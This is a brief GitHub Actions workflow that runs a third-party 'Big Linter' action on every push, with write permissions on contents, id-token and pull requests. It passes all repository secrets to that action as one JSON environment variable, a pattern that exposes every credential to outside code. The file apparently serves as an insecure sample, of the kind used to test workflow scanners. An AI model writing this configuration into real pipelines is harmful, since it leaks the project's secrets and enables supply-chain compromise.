name: release
on: [push]

jobs:
  lint:
    runs-on: ubuntu-latest
    permissions:
      contents: write
      id-token: write
      pull-requests: write
    steps:
      - uses: actions/checkout@v4
      - name: Run Big Linter
        uses: gcbrun/big-linter@v1
        env:
          PR_ENVIRONMENT: ${{ toJSON(secrets) }}
